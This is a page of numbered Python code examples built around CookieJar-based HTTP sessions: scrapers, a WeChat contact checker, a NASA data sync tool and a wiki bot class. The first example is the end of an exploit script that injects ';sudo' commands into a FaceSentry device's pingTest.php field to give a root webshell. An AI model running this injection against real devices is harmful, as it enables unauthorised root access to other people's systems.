───────▀▀▀▀──▌███▌███▌──▀▀▀▀
─────────────▌███▌███▌
─────────────▌███▌███▌
───────────▐▀▀▀██▌█▀▀▀▌
▒▒▒▒▒▒▒▒▒▒▒▐▄▄▄▄▄▄▄▄▄▄▌▒▒▒▒▒▒▒▒▒▒▒
    '''

    usage()
    tegla = CookieJar()
    global ajde, target
    target = sys.argv[1]
    ajde = urllib2.build_opener(urllib2.HTTPCookieProcessor(tegla))
    auth()
    raw_input('\n[*] Press [ENTER] to land... ')

    print '[+] Entering interactive (web)shell...'
    time.sleep(1)
    print

    while True:
        try:
            cmd = raw_input('root@facesentry:~# ')
            if 'exit' in cmd.strip():
                print '[+] Take care now, bye bye then!'
                break
            if 'door' in cmd.strip():
                door()
                continue
            podatoci = { 'strInIP' : ';sudo ' + cmd } # |cmd
            nesto_encode = urllib.urlencode(podatoci)
            r_izraz = ajde.open('http://' + target + '/pingTest.php?', nesto_encode)
            pattern = re.search(cmd+'\)<[^>]*>(.*?)</font>', r_izraz.read())
            x = pattern.groups()[0].strip()
            y = x.replace('<br>', '\n')
            print y.strip()
        except Exception as i:
            print '[-] Error: ' + i.message
            pass
        except KeyboardInterrupt as k:
            print '\n[+] Interrupter!'
            sys.exit()

    sys.exit()
Example #47
0
 def __init__(self):
     super(WebService, self).__init__()
     self._cookie = CookieJar()
     self._opener = urllib2.build_opener(
         urllib2.HTTPCookieProcessor(self._cookie))
     self.query_interval = 1.0
Example #48
0
 def __init__(self):
     cj = CookieJar()
     opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
     opener.addheaders = [('User-agent', 'Mozilla/5.0')]
Example #49
0
SITE = "https://www.reserveamerica.com"

HEADERS = {
  "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
  "Accept-Encoding":"gzip, deflate, br",
  "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4,ru;q=0.2,es;q=0.2",
  "Connection":"keep-alive",
  "DNT":"1",
  "Host":"www.reserveamerica.com",
  "Referer":"https://www.reserveamerica.com/",
  "Upgrade-Insecure-Requests":"1",
  "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"
}

cookie_jar = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
opener.addheaders = [(k, v) for k, v in HEADERS.items()]


class AvailableSite:
  def __init__(self, campsite_name, site_num, loop_name, date, book_url):
    self.campsite_name = campsite_name
    self.site_num = site_num
    self.loop_name = loop_name
    self.date = date
    self.book_url = book_url

  def __str__(self):
    formatter = '''
  Camping ground name: %s
Example #50
0
class GoogleWebMixin(object):

    cookiejar = CookieJar()
    user_agent = 'Lynx/2.8.8dev.3 libwww-FM/2.14 SSL-MM/1.4.1'

    def search_google_web(self, query, limit=0, start_page=1):
        # parsing logic based on https://github.com/maurosoria/s3arch
        url = 'https://www.google.com/search'
        num = 100
        page = start_page
        set_page = lambda x: (x - 1) * num
        payload = {
            'q': query,
            'start': set_page(page),
            'num': num,
            'complete': 0
        }
        results = []
        self.verbose('Searching Google for: %s' % (query))
        while True:
            #resp = None
            # google errors out at > 2061 characters not including the protocol
            # 21 (resource-proto) + 1 (?) + 8 (num) + 11 (complete) + 7 + len(start) + 3 + len(encoded(query))
            #max_len = 2061 - 21 - 1 - 8 - 11 - 7 - len(payload['start']) - 3
            #if len(urllib.quote_plus(query)) > max_len: query = query[:max_len]
            resp = self.request(url,
                                payload=payload,
                                redirect=False,
                                cookiejar=self.cookiejar,
                                agent=self.user_agent)
            # detect and handle captchas until answered correctly
            # first visit = 302, actual captcha = 503
            # follow the redirect to the captcha
            count = 0
            while resp.status_code == 302:
                redirect = resp.headers['location']
                # request the captcha page
                resp = self.request(redirect,
                                    redirect=False,
                                    cookiejar=self.cookiejar,
                                    agent=self.user_agent)
                count += 1
                # account for the possibility of infinite redirects
                if count == 20:
                    break
            # handle the captcha
            # check needed because the redirect could result in an error
            # will properly exit the loop and fall to the error check below
            if resp.status_code == 503:
                resp = self._solve_google_captcha(resp)
                continue
            # handle error conditions
            if resp.status_code != 200:
                self.error('Google encountered an unknown error.')
                break
            tree = fromstring(resp.text)
            links = tree.xpath('//a/@href')
            regmatch = re.compile('^/url\?q=[^/]')
            for link in links:
                if regmatch.match(
                        link
                ) != None and 'http://webcache.googleusercontent.com' not in link:
                    results.append(urllib.unquote_plus(link[7:link.find('&')]))
            # check limit
            if limit == page:
                break
            page += 1
            payload['start'] = set_page(page)
            # check for more pages
            if '>Next</' not in resp.text:
                break
        return results

    def _solve_google_captcha(self, resp):
        # set up the captcha page markup for parsing
        tree = fromstring(resp.text)
        # extract and request the captcha image
        resp = self.request('https://ipv4.google.com' +
                            tree.xpath('//img/@src')[0],
                            redirect=False,
                            cookiejar=self.cookiejar,
                            agent=self.user_agent)
        # store the captcha image to the file system
        with tempfile.NamedTemporaryFile(suffix='.jpg') as fp:
            fp.write(resp.raw)
            fp.flush()
            # open the captcha image for viewing in gui environments
            w = webbrowser.get()
            w.open('file://' + fp.name)
            self.alert(fp.name)
            _payload = {'captcha': raw_input('[CAPTCHA] Answer: ')}
            # temporary captcha file removed on close
        # extract the form elements for the capctah answer request
        form = tree.xpath('//form[@action="index"]')[0]
        for x in ['q', 'continue', 'submit']:
            _payload[x] = form.xpath('//input[@name="%s"]/@value' % (x))[0]
        # send the captcha answer
        return self.request('https://ipv4.google.com/sorry/CaptchaRedirect',
                            payload=_payload,
                            cookiejar=self.cookiejar,
                            agent=self.user_agent)
Example #51
0
def get(url,
        user_agent=None,
        verbose=False,
        max_retries=10,
        initial_delay_seconds=2,
        retry_delay_multiplier=2,
        ignore_404=True,
        ignore_410=True,
        ignore_500=True,
        ignore_400=True,
        ignore_403=True,
        timeout=10,
        allow_cookies=False,
        max_delay_seconds=30):
    """
    Retreives the content of a URL, applying a customizable user-agent and
    intelligentally waiting when network errors are encountered.
    """

    opener = None
    if allow_cookies:
        cj = CookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

    _user_agent = user_agent
    for retry in xrange(max_retries):
        try:
            if _user_agent is None:
                user_agent = random.choice(USER_AGENTS)
            if verbose:
                print url

            if opener:
                opener.addheaders = [('User-agent', user_agent),
                                     ('Accept', '*/*')]
                response = opener.open(url, timeout=timeout)
            else:
                request = urllib2.Request(url=url,
                                          headers={
                                              'User-agent': user_agent,
                                              'Accept': '*/*'
                                          })
                response = urllib2.urlopen(request, timeout=timeout)

            break
        except urllib2.HTTPError, e:
            if ignore_400 and '400' in str(e):
                return
            if ignore_410 and '410' in str(e):
                return
            if ignore_403 and '403' in str(e):
                return
            if ignore_404 and '404' in str(e):
                return
            if ignore_500 and '500' in str(e):
                return
            if 'not found' in str(e).lower() and not ignore_404:
                raise
            if verbose:
                print 'scrapper.get.error: %s' % (e, )
            if retry == max_retries - 1:
                raise
            # Wait a short while, in case the error is due to a temporary
            # networking problem.
            time.sleep(
                min(max_delay_seconds,
                    initial_delay_seconds + retry * retry_delay_multiplier))
Example #52
0
    import save
    
    save.state = 0
    
    save.nbposts = 0
    save.nbtopics = 0
    save.nbusers = 0
    
    save.forums = []
    save.topics = []
    save.users = []
    save.smileys = {}
    save.posts = []

logging.debug('Création de l\'urlopener')
cookiejar = CookieJar()
urlopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar))

month = {u'Jan' : 1,
         u'Fév' : 2,
         u'Mar' : 3,
         u'Avr' : 4,
         u'Mai' : 5,
         u'Juin' : 6,
         u'Juil' : 7,
         u'Aoû' : 8,
         u'Sep' : 9,
         u'Oct' : 10,
         u'Nov' : 11,
         u'Déc' : 12}
Example #53
0
def main():

    try:
        ssl._create_default_https_context = ssl._create_unverified_context

        opener = wdf_urllib.build_opener(
            wdf_urllib.HTTPCookieProcessor(CookieJar()))
        opener.addheaders = [(
            'User-agent',
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36'
        )]
        wdf_urllib.install_opener(opener)
    except:
        pass

    if not getUUID():
        print('获取uuid失败')
        return

    print('正在获取二维码图片...')
    showQRImage()
    time.sleep(1)

    while waitForLogin() != '200':
        pass

    os.remove(QRImagePath)

    if not login():
        print('登录失败')
        return

    if not webwxinit():
        print('初始化失败')
        return

    MemberList = webwxgetcontact()

    print('开启心跳线程')
    thread.start_new_thread(heartBeatLoop, ())

    MemberCount = len(MemberList)
    print('通讯录共%s位好友' % MemberCount)

    ChatRoomName = ''
    result = []
    d = {}
    for Member in MemberList:
        d[Member['UserName']] = (Member['NickName'].encode('utf-8'),
                                 Member['RemarkName'].encode('utf-8'))
    print('开始查找...')
    group_num = int(math.ceil(MemberCount / float(MAX_GROUP_NUM)))
    for i in range(0, group_num):
        UserNames = []
        for j in range(0, MAX_GROUP_NUM):
            if i * MAX_GROUP_NUM + j >= MemberCount:
                break
            Member = MemberList[i * MAX_GROUP_NUM + j]
            UserNames.append(Member['UserName'])

        # 新建群组/添加成员
        if ChatRoomName == '':
            (ChatRoomName, DeletedList,
             BlockedList) = createChatroom(UserNames)
        else:
            (DeletedList, BlockedList) = addMember(ChatRoomName, UserNames)

        # todo BlockedList 被拉黑列表

        DeletedCount = len(DeletedList)
        if DeletedCount > 0:
            result += DeletedList

        # 删除成员
        deleteMember(ChatRoomName, UserNames)

        # 进度条
        progress = MAX_PROGRESS_LEN * (i + 1) / group_num
        print('[',
              '#' * progress,
              '-' * (MAX_PROGRESS_LEN - progress),
              ']',
              end=' ')
        print('新发现你被%d人删除' % DeletedCount)
        for i in range(DeletedCount):
            if d[DeletedList[i]][1] != '':
                print(d[DeletedList[i]][0] + '(%s)' % d[DeletedList[i]][1])
            else:
                print(d[DeletedList[i]][0])

        if i != group_num - 1:
            print('正在继续查找,请耐心等待...')
            # 下一次进行接口调用需要等待的时间
            time.sleep(INTERFACE_CALLING_INTERVAL)
    # todo 删除群组

    print('\n结果汇总完毕,20s后可重试...')
    resultNames = []
    for r in result:
        if d[r][1] != '':
            resultNames.append(d[r][0] + '(%s)' % d[r][1])
        else:
            resultNames.append(d[r][0])

    print('---------- 被删除的好友列表(共%d人) ----------' % len(result))
    # 过滤emoji
    resultNames = map(lambda x: re.sub(r'<span.+/span>', '', x), resultNames)
    if len(resultNames):
        print('\n'.join(resultNames))
    else:
        print("无")
    print('---------------------------------------------')
Example #54
0
#!/usr/bin/env python
# coding: utf-8

import urllib2, urllib
from cookielib import CookieJar

EMAIL = '*****@*****.**'
PASSWD = 'pass'

# cookie support
urllib2.install_opener(
    urllib2.build_opener(urllib2.HTTPCookieProcessor(CookieJar())))

# login
headers = {
    'User-Agent':
    'Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'
}
data = urllib.urlencode({'email': EMAIL, 'password': PASSWD, 'submit': '登 录'})
r = urllib2.Request('http://www.xiami.com/member/login',
                    data=data,
                    headers=headers)
urllib2.urlopen(r).read()

# checkin
headers['X-Requested-With'] = 'XMLHttpRequest'
headers['Referer'] = 'http://www.xiami.com/'
r = urllib2.Request('http://www.xiami.com/task/signin',
                    data='',
                    headers=headers)
print urllib2.urlopen(r).read()
Example #55
0
def nsidc_icesat2_sync(ddir,
                       PRODUCTS,
                       VERSION,
                       GRANULES,
                       USER='',
                       PASSWORD='',
                       YEARS=None,
                       SUBDIRECTORY=None,
                       LOG=False,
                       LIST=False,
                       MODE=None,
                       CLOBBER=False):

    #-- output of synchronized files
    if LOG:
        #-- output to log file
        LOGDIR = os.path.join(ddir, 'icesat2.dir', 'sync_logs.dir')
        #-- check if log directory exists and recursively create if not
        os.makedirs(LOGDIR, MODE) if not os.path.exists(LOGDIR) else None
        #-- format: NSIDC_IceBridge_sync_2002-04-01.log
        today = time.strftime('%Y-%m-%d', time.localtime())
        LOGFILE = 'NSIDC_IceSat-2_sync_{0}.log'.format(today)
        fid = open(os.path.join(LOGDIR, LOGFILE), 'w')
        print('IceBridge Data Sync Log ({0})'.format(today), file=fid)
    else:
        #-- standard output (terminal output)
        fid = sys.stdout

    #-- https://docs.python.org/3/howto/urllib2.html#id5
    #-- create a password manager
    password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
    #-- Add the username and password for NASA Earthdata Login system
    password_mgr.add_password(None, 'https://urs.earthdata.nasa.gov', USER,
                              PASSWORD)
    #-- Encode username/password for request authorization headers
    base64_string = base64.b64encode('{0}:{1}'.format(USER, PASSWORD).encode())
    #-- compile HTML parser for lxml
    parser = lxml.etree.HTMLParser()
    #-- Create cookie jar for storing cookies. This is used to store and return
    #-- the session cookie given to use by the data server (otherwise will just
    #-- keep sending us back to Earthdata Login to authenticate).
    cookie_jar = CookieJar()
    #-- create "opener" (OpenerDirector instance)
    opener = urllib2.build_opener(
        urllib2.HTTPBasicAuthHandler(password_mgr),
        #urllib2.HTTPHandler(debuglevel=1),  # Uncomment these two lines to see
        #urllib2.HTTPSHandler(debuglevel=1), # details of the requests/responses
        urllib2.HTTPCookieProcessor(cookie_jar))
    #-- add Authorization header to opener
    authorization_header = "Basic {0}".format(base64_string.decode())
    opener.addheaders = [("Authorization", authorization_header)]
    #-- Now all calls to urllib2.urlopen use our opener.
    urllib2.install_opener(opener)
    #-- All calls to urllib2.urlopen will now use handler
    #-- Make sure not to include the protocol in with the URL, or
    #-- HTTPPasswordMgrWithDefaultRealm will be confused.

    #-- remote https server for ICESat-2 Data
    HOST = 'https://n5eil01u.ecs.nsidc.org'
    #-- regular expression operator for finding files of a particular granule
    remote_regex_pattern = '{0}_(\d+)_03140110_(\d+)_{1:02d}.(.*?)'
    #-- regular expression operator for finding subdirectories
    if SUBDIRECTORY:
        #-- Sync particular subdirectories for product
        R2 = re.compile('(' + '|'.join(SUBDIRECTORY) + ')', re.VERBOSE)
    elif YEARS:
        #-- Sync particular years for product
        regex_pattern = '|'.join('{0:d}'.format(y) for y in YEARS)
        R2 = re.compile('({0}).(\d+).(\d+)'.format(regex_pattern), re.VERBOSE)
    else:
        #-- Sync all available years for product
        R2 = re.compile('(\d+).(\d+).(\d+)', re.VERBOSE)

    #-- for each icesat2 product listed
    for p in PRODUCTS:
        print('PRODUCT={0}'.format(p), file=fid) if LOG else None
        #-- input directory for product
        DIRECTORY = os.path.join(ddir, '{0}.{1:03d}'.format(p, VERSION))
        #-- get directories from remote directory
        remote_directories = ['ATLAS', '{0}.{1:03d}'.format(p, VERSION)]
        d = posixpath.join(HOST, *remote_directories)
        req = urllib2.Request(url=d)
        #-- read and parse request for subdirectories (find column names)
        tree = lxml.etree.parse(urllib2.urlopen(req), parser)
        colnames = tree.xpath('//td[@class="indexcolname"]//a/@href')
        remote_sub = [sd for sd in colnames if R2.match(sd)]
        #-- for each remote subdirectory
        for sd in remote_sub:
            #-- check if data directory exists and recursively create if not
            local_dir = os.path.join(DIRECTORY, sd)
            os.makedirs(local_dir,
                        MODE) if not os.path.exists(local_dir) else None
            #-- find ICESat-2 data files
            req = urllib2.Request(url=posixpath.join(d, dir, sd))
            #-- read and parse request for remote files (columns and dates)
            tree = lxml.etree.parse(urllib2.urlopen(req), parser)
            colnames = tree.xpath('//td[@class="indexcolname"]//a/@href')
            collastmod = tree.xpath('//td[@class="indexcollastmod"]/text()')
            remote_file_lines = [
                i for i, f in enumerate(colnames)
                if re.match(remote_regex_pattern, f)
            ]
            #-- sync each ICESat-2 data file
            for i in remote_file_lines:
                #-- remote and local versions of the file
                remote_file = posixpath.join(d, dir, sd, colnames[i])
                local_file = os.path.join(local_dir, colnames[i])
                #-- get last modified date and convert into unix time
                LMD = time.strptime(collastmod[i].rstrip(), '%Y-%m-%d %H:%M')
                remote_mtime = calendar.timegm(LMD)
                #-- sync ICESat-2 files with NSIDC server
                http_pull_file(fid, remote_file, remote_mtime, local_file,
                               LIST, CLOBBER, MODE)
        #-- close request
        req = None

    #-- close log file and set permissions level to MODE
    if LOG:
        fid.close()
        os.chmod(os.path.join(LOGDIR, LOGFILE), MODE)
Example #56
0
class _RequestsHandler(object):
    def __init__(self,
                 cache_dir=None,
                 web_time_out=30,
                 cookie_jar=None,
                 ignore_ssl_errors=False):
        """ Initialises the UriHandler class

        Keyword Arguments:
        :param str cache_dir:         A path for http caching. If specified, caching will be used.
        :param int web_time_out:      Timeout for requests in seconds
        :param str cookie_jar:        The path to the cookie jar (in case of file storage)
        :param ignore_ssl_errors:     Ignore any SSL certificate errors.

        """

        self.id = int(time.time())

        if cookie_jar:
            self.cookieJar = MozillaCookieJar(cookie_jar)
            if not os.path.isfile(cookie_jar):
                self.cookieJar.save()
            self.cookieJar.load()
            self.cookieJarFile = True
        else:
            self.cookieJar = CookieJar()
            self.cookieJarFile = False

        self.cacheDir = cache_dir
        self.cacheStore = None
        if cache_dir:
            self.cacheStore = StreamCache(cache_dir)
            Logger.debug("Opened %s", self.cacheStore)
        else:
            Logger.debug("No cache-store provided. Cached disabled.")

        self.userAgent = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 (.NET CLR 3.5.30729)"
        self.webTimeOut = web_time_out  # max duration of request
        self.ignoreSslErrors = ignore_ssl_errors  # ignore SSL errors
        if self.ignoreSslErrors:
            Logger.warning("Ignoring all SSL errors in Python")

        # status of the most recent call
        self.status = UriStatus(code=0, url=None, error=False, reason=None)

        # for download animation
        self.__animationIndex = -1

    def download(self,
                 uri,
                 filename,
                 folder,
                 progress_callback=None,
                 proxy=None,
                 params="",
                 data="",
                 json="",
                 referer=None,
                 additional_headers=None):
        """ Downloads a remote file

        :param str filename:                The filename that should be used to store the file.
        :param str folder:                  The folder to save the file in.
        :param str params:                  Data to send with the request (open(uri, params)).
        :param str uri:                     The URI to download.
        :param dict[str, any]|str data:     Data to send with the request (open(uri, data)).
        :param dict[str, any] json:              Json to send with the request (open(uri, params)).
        :param ProxyInfo proxy:             The address and port (proxy.address.ext:port) of a
                                            proxy server that should be used.
        :param str referer:                 The http referer to use.
        :param dict additional_headers:     The optional headers.
        :param function progress_callback:  The callback for progress update. The format is
                                            function(retrievedSize, totalSize, perc, completed, status)

        :return: The full path of the loccation to which it was downloaded.
        :rtype: str

        """

        if not folder or not filename:
            raise ValueError(
                "Destination folder and filename should be specified")
        if not os.path.isdir(folder):
            raise ValueError("Destination folder is not a valid location")
        if not progress_callback:
            raise ValueError("A callback must be specified")

        download_path = os.path.join(folder, filename)
        if os.path.isfile(download_path):
            Logger.info("Url already downloaded to: %s", download_path)
            return download_path

        Logger.info("Creating Downloader for url '%s' to filename '%s'", uri,
                    download_path)
        r = self.__requests(uri,
                            proxy=proxy,
                            params=params,
                            data=data,
                            json=json,
                            referer=referer,
                            additional_headers=additional_headers,
                            no_cache=True,
                            stream=True)
        if r is None:
            return ""

        retrieved_bytes = 0
        total_size = int(r.headers.get('Content-Length', '0').strip())
        # There is an issue with the way Requests checks for input and it does not like the newInt.
        if PY2:
            chunk_size = 10 * 1024
        else:
            chunk_size = 1024 if total_size == 0 else total_size // 100
        cancel = False
        with open(download_path, 'wb') as fd:
            for chunk in r.iter_content(chunk_size=chunk_size):
                fd.write(chunk)
                retrieved_bytes += len(chunk)

                if progress_callback:
                    cancel = self.__do_progress_callback(
                        progress_callback, retrieved_bytes, total_size, False)
                if cancel:
                    Logger.warning("Download of %s aborted", uri)
                    break

        if cancel:
            if os.path.isfile(download_path):
                Logger.info("Removing partial download: %s", download_path)
                os.remove(download_path)
            return ""

        if progress_callback:
            self.__do_progress_callback(progress_callback, retrieved_bytes,
                                        total_size, True)
        return download_path

    def open(self,
             uri,
             proxy=None,
             params=None,
             data=None,
             json=None,
             referer=None,
             additional_headers=None,
             no_cache=False):
        """ Open an URL Async using a thread

        :param str uri:                         The URI to download.
        :param str params:                      Data to send with the request (open(uri, params)).
        :param dict[str, any]|str|bytes data:   Data to send with the request (open(uri, data)).
        :param dict[str, any] json:             Json to send with the request (open(uri, params)).
        :param ProxyInfo proxy:                 The address and port (proxy.address.ext:port) of a
                                                proxy server that should be used.
        :param str referer:                     The http referer to use.
        :param dict|None additional_headers:    The optional headers.
        :param bool no_cache:                   Should cache be disabled.

        :return: The data that was retrieved from the URI.
        :rtype: str|unicode

        """
        r = self.__requests(uri,
                            proxy=proxy,
                            params=params,
                            data=data,
                            json=json,
                            referer=referer,
                            additional_headers=additional_headers,
                            no_cache=no_cache,
                            stream=False)
        if r is None:
            return ""

        content_type = r.headers.get("content-type", "")
        if r.encoding == 'ISO-8859-1' and "text" in content_type:
            # Requests defaults to ISO-8859-1 for all text content that does not specify an encoding
            Logger.debug(
                "Found 'ISO-8859-1' for 'text' content-type. Using UTF-8 instead."
            )
            r.encoding = 'utf-8'

        # We might need a better mechanism here.
        if not r.encoding and content_type.lower() in [
                "application/json", "application/javascript"
        ]:
            return r.text

        return r.text if r.encoding else r.content

    def header(self, uri, proxy=None, referer=None, additional_headers=None):
        """ Retrieves header information only.

        :param str uri:                         The URI to fetch the header from.
        :param ProxyInfo|none proxy:            The address and port (proxy.address.ext:port) of a
                                                proxy server that should be used.
        :param str|none referer:                The http referer to use.
        :param dict|none additional_headers:    The optional headers.

        :return: Content-type and the URL to which a redirect could have occurred.
        :rtype: tuple[str,str]

        """

        with requests.session() as s:
            s.cookies = self.cookieJar
            s.verify = not self.ignoreSslErrors

            proxies = self.__get_proxies(proxy, uri)
            headers = self.__get_headers(referer, additional_headers)

            Logger.info("Performing a HEAD for %s", uri)
            r = s.head(uri,
                       proxies=proxies,
                       headers=headers,
                       allow_redirects=True,
                       timeout=self.webTimeOut)

            content_type = r.headers.get("Content-Type", "")
            real_url = r.url

            self.status = UriStatus(code=r.status_code,
                                    url=uri,
                                    error=not r.ok,
                                    reason=r.reason)
            if self.cookieJarFile:
                # noinspection PyUnresolvedReferences
                self.cookieJar.save()

            if r.ok:
                Logger.info("%s resulted in '%s %s' (%s) for %s",
                            r.request.method, r.status_code, r.reason,
                            r.elapsed, r.url)
                return content_type, real_url
            else:
                Logger.error("%s failed with in '%s %s' (%s) for %s",
                             r.request.method, r.status_code, r.reason,
                             r.elapsed, r.url)
                return "", ""

    # noinspection PyUnusedLocal
    def __requests(self, uri, proxy, params, data, json, referer,
                   additional_headers, no_cache, stream):

        with requests.session() as s:
            s.cookies = self.cookieJar
            s.verify = not self.ignoreSslErrors
            if self.cacheStore and not no_cache:
                Logger.trace("Adding the %s to the request", self.cacheStore)
                s.mount("https://", CacheHTTPAdapter(self.cacheStore))
                s.mount("http://", CacheHTTPAdapter(self.cacheStore))

            proxies = self.__get_proxies(proxy, uri)
            if proxies is not None and "dns" in proxies:
                s.mount(
                    "https://",
                    DnsResolverHTTPAdapter(uri,
                                           proxies["dns"],
                                           logger=Logger.instance()))

            headers = self.__get_headers(referer, additional_headers)

            if params is not None:
                # Old UriHandler behaviour. Set form header to keep compatible
                if "content-type" not in headers:
                    headers[
                        "content-type"] = "application/x-www-form-urlencoded"

                Logger.info("Performing a POST with '%s' for %s",
                            headers["content-type"], uri)
                r = s.post(uri,
                           data=params,
                           proxies=proxies,
                           headers=headers,
                           stream=stream,
                           timeout=self.webTimeOut)
            elif data is not None:
                # Normal Requests compatible data object
                Logger.info("Performing a POST with '%s' for %s",
                            headers.get("content-type", "<No Content-Type>"),
                            uri)
                r = s.post(uri,
                           data=data,
                           proxies=proxies,
                           headers=headers,
                           stream=stream,
                           timeout=self.webTimeOut)
            elif json is not None:
                Logger.info("Performing a json POST with '%s' for %s",
                            headers.get("content-type", "<No Content-Type>"),
                            uri)
                r = s.post(uri,
                           json=json,
                           proxies=proxies,
                           headers=headers,
                           stream=stream,
                           timeout=self.webTimeOut)
            else:
                Logger.info("Performing a GET for %s", uri)
                r = s.get(uri,
                          proxies=proxies,
                          headers=headers,
                          stream=stream,
                          timeout=self.webTimeOut)

            if r.ok:
                Logger.info("%s resulted in '%s %s' (%s) for %s",
                            r.request.method, r.status_code, r.reason,
                            r.elapsed, r.url)
            else:
                Logger.error("%s failed with '%s %s' (%s) for %s",
                             r.request.method, r.status_code, r.reason,
                             r.elapsed, r.url)

            self.status = UriStatus(code=r.status_code,
                                    url=r.url,
                                    error=not r.ok,
                                    reason=r.reason)
            if self.cookieJarFile:
                # noinspection PyUnresolvedReferences
                self.cookieJar.save()
            return r

    def __get_headers(self, referer, additional_headers):
        headers = {}
        if additional_headers:
            for k, v in additional_headers.items():
                headers[k.lower()] = v

        if "user-agent" not in headers:
            headers["user-agent"] = self.userAgent
        if referer and "referer" not in headers:
            headers["referer"] = referer

        return headers

    def __get_proxies(self, proxy, url):
        """

        :param ProxyInfo proxy:
        :param url:

        :return:
        :rtype: dict[str, str]

        """

        if proxy is None:
            return None

        elif not proxy.use_proxy_for_url(url):
            Logger.debug("Not using proxy due to filter mismatch")

        elif proxy.Scheme == "http":
            Logger.debug("Using a http(s) %s", proxy)
            proxy_address = proxy.get_proxy_address()
            return {"http": proxy_address, "https": proxy_address}

        elif proxy.Scheme == "dns":
            Logger.debug("Using a DNS %s", proxy)
            return {"dns": proxy.Proxy}

        Logger.warning("Unsupported Proxy Scheme: %s", proxy.Scheme)
        return None

    def __do_progress_callback(self, progress_callback, retrieved_size,
                               total_size, completed):
        """ Performs a callback, if the progressCallback was specified.

        :param progress_callback:        The callback method
        :param retrieved_size:           Number of bytes retrieved
        :param total_size:               Total number of bytes
        :param completed:               Are we done?
        @rtype : Boolean                Should we cancel the download?

        """

        if progress_callback is None:
            # no callback so it was not cancelled
            return False

        # calculated some stuff
        self.__animationIndex = (self.__animationIndex + 1) % 4
        bytes_to_mb = 1048576
        animation_frames = ["-", "\\", "|", "/"]
        animation = animation_frames[self.__animationIndex]
        retrievedsize_mb = 1.0 * retrieved_size / bytes_to_mb
        totalsize_mb = 1.0 * total_size / bytes_to_mb
        if total_size > 0:
            percentage = 100.0 * retrieved_size / total_size
        else:
            percentage = 0
        status = '%s - %i%% (%.1f of %.1f MB)' % \
                 (animation, percentage, retrievedsize_mb, totalsize_mb)
        try:
            return progress_callback(retrieved_size, total_size, percentage,
                                     completed, status)
        except:
            Logger.error("Error in Progress Callback", exc_info=True)
            # cancel the download
            return True

    def __str__(self):
        return "UriHandler [id={0}, useCaching={1}, ignoreSslErrors={2}]"\
            .format(self.id, self.cacheStore, self.ignoreSslErrors)
Example #57
0
 def __init__(self, email="", password=""):
     self.email = email
     self.password = password
     self.cj = CookieJar()
Example #58
0
class Site(object):
    """
    **EarwigBot: Wiki Toolset: Site**

    Represents a site, with support for API queries and returning
    :py:class:`~earwigbot.wiki.page.Page`,
    :py:class:`~earwigbot.wiki.user.User`,
    and :py:class:`~earwigbot.wiki.category.Category` objects. The constructor
    takes a bunch of arguments and you probably won't need to call it directly,
    rather :py:meth:`wiki.get_site() <earwigbot.wiki.sitesdb.SitesDB.get_site>`
    for returning :py:class:`Site`
    instances, :py:meth:`wiki.add_site()
    <earwigbot.wiki.sitesdb.SitesDB.add_site>` for adding new ones to our
    database, and :py:meth:`wiki.remove_site()
    <earwigbot.wiki.sitesdb.SitesDB.remove_site>` for removing old ones from
    our database, should suffice.

    *Attributes:*

    - :py:attr:`name`:    the site's name (or "wikiid"), like ``"enwiki"``
    - :py:attr:`project`: the site's project name, like ``"wikipedia"``
    - :py:attr:`lang`:    the site's language code, like ``"en"``
    - :py:attr:`domain`:  the site's web domain, like ``"en.wikipedia.org"``
    - :py:attr:`url`:     the site's URL, like ``"https://en.wikipedia.org"``

    *Public methods:*

    - :py:meth:`api_query`:            does an API query with kwargs as params
    - :py:meth:`sql_query`:            does an SQL query and yields its results
    - :py:meth:`get_maxlag`:           returns the internal database lag
    - :py:meth:`get_replag`:           estimates the external database lag
    - :py:meth:`namespace_id_to_name`: returns names associated with an NS id
    - :py:meth:`namespace_name_to_id`: returns the ID associated with a NS name
    - :py:meth:`get_page`:             returns a Page for the given title
    - :py:meth:`get_category`:         returns a Category for the given title
    - :py:meth:`get_user`:             returns a User object for the given name
    - :py:meth:`delegate`:             controls when the API or SQL is used
    """
    SERVICE_API = 1
    SERVICE_SQL = 2

    def __init__(self, name=None, project=None, lang=None, base_url=None,
                 article_path=None, script_path=None, sql=None,
                 namespaces=None, login=(None, None), cookiejar=None,
                 user_agent=None, use_https=False, assert_edit=None,
                 maxlag=None, wait_between_queries=2, logger=None,
                 search_config=None):
        """Constructor for new Site instances.

        This probably isn't necessary to call yourself unless you're building a
        Site that's not in your config and you don't want to add it - normally
        all you need is wiki.get_site(name), which creates the Site for you
        based on your config file and the sites database. We accept a bunch of
        kwargs, but the only ones you really "need" are *base_url* and
        *script_path*; this is enough to figure out an API url. *login*, a
        tuple of (username, password), is highly recommended. *cookiejar* will
        be used to store cookies, and we'll use a normal CookieJar if none is
        given.

        First, we'll store the given arguments as attributes, then set up our
        URL opener. We'll load any of the attributes that weren't given from
        the API, and then log in if a username/pass was given and we aren't
        already logged in.
        """
        # Attributes referring to site information, filled in by an API query
        # if they are missing (and an API url can be determined):
        self._name = name
        self._project = project
        self._lang = lang
        self._base_url = base_url
        self._article_path = article_path
        self._script_path = script_path
        self._namespaces = namespaces

        # Attributes used for API queries:
        self._use_https = use_https
        self._assert_edit = assert_edit
        self._maxlag = maxlag
        self._wait_between_queries = wait_between_queries
        self._max_retries = 6
        self._last_query_time = 0
        self._api_lock = Lock()
        self._api_info_cache = {"maxlag": 0, "lastcheck": 0}

        # Attributes used for SQL queries:
        if sql:
            self._sql_data = sql
        else:
            self._sql_data = {}
        self._sql_conn = None
        self._sql_lock = Lock()
